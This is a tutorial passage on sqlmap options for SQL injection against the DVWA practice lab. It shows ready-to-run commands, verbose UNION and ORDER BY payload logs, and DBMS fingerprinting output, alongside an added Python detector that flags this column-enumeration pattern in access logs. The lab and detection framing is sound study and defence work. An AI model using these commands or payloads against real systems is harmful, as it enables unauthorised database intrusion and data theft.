Specifying the injection technique
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique="BEUSTQ"
B: Boolean-based blind injection
E: error-based injection
U: UNION query injection
S: stacked queries injection
T: time-based blind injection
Q: inline query injection
By default all techniques are used, which is equivalent to --technique="BEUSTQ".
Time-based blind injection parameters
--time-sec: set the delay used for time-based blind injection, in seconds (default 5 seconds).
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique=T --time-sec=1
UNION injection parameters
--union-cols: set the number of columns tested in UNION injection; the default range is 1-10 columns. Raising --level also widens the range, but --union-cols lets you fix the range explicitly. For example, to test 12-18 columns:
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-cols="12-18"
--union-char: set the character (placeholder value) used in UNION injection; the default is NULL. At higher --level values sqlmap also tests with random numbers, because in some cases a UNION query tested with NULL fails while a random number succeeds. For example, to set the UNION character to "123":
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-char="123" -v 3
Using 123 as the UNION character, with the default range of 1-10 columns:
[22:19:32] [PAYLOAD] -9103) ORDER BY 1-- JliU
[22:19:32] [PAYLOAD] -6117) ORDER BY 4864-- XFDV
[22:19:32] [PAYLOAD] -5546) UNION ALL SELECT 123-- ueOQ
[22:19:32] [PAYLOAD] -8136) UNION ALL SELECT 123,123-- ksax
[22:19:33] [PAYLOAD] -6350) UNION ALL SELECT 123,123,123-- UHzH
[22:19:33] [PAYLOAD] -4218) UNION ALL SELECT 123,123,123,123-- rbVp
[22:19:33] [PAYLOAD] -1370) UNION ALL SELECT 123,123,123,123,123-- iprn
[22:19:33] [PAYLOAD] -5507) UNION ALL SELECT 123,123,123,123,123,123-- Inhq
[22:19:33] [PAYLOAD] -9862) UNION ALL SELECT 123,123,123,123,123,123,123-- IwGO
[22:19:33] [PAYLOAD] -5351) UNION ALL SELECT 123,123,123,123,123,123,123,123-- EdWF
[22:19:33] [PAYLOAD] -3384) UNION ALL SELECT 123,123,123,123,123,123,123,123,123-- ThkG
[22:19:33] [PAYLOAD] -6285) UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123-- vyBV
--union-from: set the table that the UNION injection queries from, e.g. to use the users table as the FROM table:
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-from="users" -v 3
The default placeholder NULL is used, the column range is 1-10, and the specified table is users:
[22:27:16] [PAYLOAD] 1) ORDER BY 1-- Vrdu
[22:27:16] [WARNING] reflective value(s) found and filtering out
[22:27:16] [PAYLOAD] 1) ORDER BY 6196-- MvfX
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL FROM users-- cmox
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL FROM users-- FwKo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL FROM users-- fmaB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL FROM users-- MuVY
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL FROM users-- Wijp
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM users-- wYUU
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- rWYB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LvGo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LnTt
[22:27:17] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- YGVF
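The two -v 3 traces above make the column-enumeration pattern easy to recognise from the defender's side: a pair of ORDER BY probes followed by UNION ALL SELECT with one more NULL (or fixed value) per request, optionally ending in FROM <table>. The script below is an added example, not part of the original notes or of sqlmap, that looks for exactly that shape in web server access logs and summarises it per client IP; the log lines are constructed for the example (invented IPs, dates and sizes, with query strings mirroring the payloads printed above), and the threshold MIN_UNION_PROBES is an assumed tuning value.

```python
"""Detect sqlmap-style UNION column enumeration in access logs.

Added example (not from the original notes): recognises ORDER BY n probes and
UNION ALL SELECT probes with a growing column list, and reports them per
client IP so a defender can alert on the enumeration pattern.
"""
import re
from collections import defaultdict
from typing import Optional
from urllib.parse import unquote_plus

# Constructed sample lines in Combined Log Format (IPs, dates and sizes are invented).
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:22:19:32 +0000] "GET /vulnerabilities/sqli/?id=-9103%29%20ORDER%20BY%201--%20JliU&Submit=Submit HTTP/1.1" 200 4312
10.0.0.5 - - [12/May/2024:22:19:32 +0000] "GET /vulnerabilities/sqli/?id=-6117%29%20ORDER%20BY%204864--%20XFDV&Submit=Submit HTTP/1.1" 200 4312
10.0.0.5 - - [12/May/2024:22:19:32 +0000] "GET /vulnerabilities/sqli/?id=-5546%29%20UNION%20ALL%20SELECT%20123--%20ueOQ&Submit=Submit HTTP/1.1" 200 4312
10.0.0.5 - - [12/May/2024:22:19:32 +0000] "GET /vulnerabilities/sqli/?id=-8136%29%20UNION%20ALL%20SELECT%20123,123--%20ksax&Submit=Submit HTTP/1.1" 200 4312
10.0.0.5 - - [12/May/2024:22:19:33 +0000] "GET /vulnerabilities/sqli/?id=-6350%29%20UNION%20ALL%20SELECT%20123,123,123--%20UHzH&Submit=Submit HTTP/1.1" 200 4312
10.0.0.7 - - [12/May/2024:22:27:16 +0000] "GET /vulnerabilities/sqli/?id=1%29%20UNION%20ALL%20SELECT%20NULL,NULL%20FROM%20users--%20FwKo&Submit=Submit HTTP/1.1" 200 4588
10.0.0.9 - - [12/May/2024:22:30:01 +0000] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4588
"""

# Client IP and request target out of a Combined Log Format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"'
)
# "ORDER BY n" probe used to bracket the column count.
ORDER_BY_RE = re.compile(r"\bORDER\s+BY\s+(\d+)", re.IGNORECASE)
# "UNION [ALL] SELECT a,b,c [FROM table] --" probe; the select list is captured
# so its length can be counted.
UNION_RE = re.compile(
    r"\bUNION\s+(?:ALL\s+)?SELECT\s+(?P<cols>.+?)(?:\s+FROM\s+(?P<table>\w+))?\s*--",
    re.IGNORECASE,
)

# Assumed tuning value: how many consecutive, growing UNION probes count as enumeration.
MIN_UNION_PROBES = 3


def classify_request(target: str) -> Optional[dict]:
    """Describe the probe in one (URL-encoded) request target, or None if it is not one."""
    decoded = unquote_plus(target)
    m = UNION_RE.search(decoded)
    if m:
        return {
            "kind": "union",
            "columns": len(m.group("cols").split(",")),
            "table": m.group("table"),
        }
    m = ORDER_BY_RE.search(decoded)
    if m:
        return {"kind": "order_by", "position": int(m.group(1))}
    return None


def analyze_log(text: str) -> dict:
    """Aggregate probes per client IP; only IPs that sent at least one probe are reported."""
    per_ip = defaultdict(lambda: {"order_by": 0, "union_columns": [], "tables": set()})
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        probe = classify_request(m.group("target"))
        if probe is None:
            continue
        stats = per_ip[m.group("ip")]
        if probe["kind"] == "order_by":
            stats["order_by"] += 1
        else:
            stats["union_columns"].append(probe["columns"])
            if probe["table"]:
                stats["tables"].add(probe["table"])

    report = {}
    for ip, stats in per_ip.items():
        cols = stats["union_columns"]
        # Enumeration = enough UNION probes whose column count grows by one each time.
        growing = len(cols) >= MIN_UNION_PROBES and all(
            b == a + 1 for a, b in zip(cols, cols[1:])
        )
        report[ip] = {
            "order_by_probes": stats["order_by"],
            "max_columns_probed": max(cols, default=0),
            "tables": sorted(stats["tables"]),
            "enumeration_detected": growing,
        }
    return report


if __name__ == "__main__":
    for ip, summary in analyze_log(SAMPLE_LOG).items():
        print(ip, summary)
```

The detector keys on the SQL shape rather than on the trailing random comment (`-- JliU`), so it still fires when that suffix is changed; a single UNION request with NULL,NULL FROM users (10.0.0.7 in the sample) is recorded with its table name but is not flagged as enumeration on its own.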
DNS-based attack
--dns-domain: carry out the attack through the specified DNS domain; this requires that the target has a DNS service open on port 53.
sqlmap -u "目标URL" --dns-domain="目标URL"
Getting database fingerprint information
-f or --fingerprint
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=8jh3juigrkaqipeu1oiinhcpbi; security=low" -f
From the output below we can see that the database is MySQL, version 5.7:
[20:15:10] [INFO] testing MySQL
[20:15:10] [INFO] confirming MySQL
[20:15:11] [INFO] the back-end DBMS is MySQL
[20:15:11] [INFO] actively fingerprinting MySQL
[20:15:11] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
html error message fingerprint: MySQL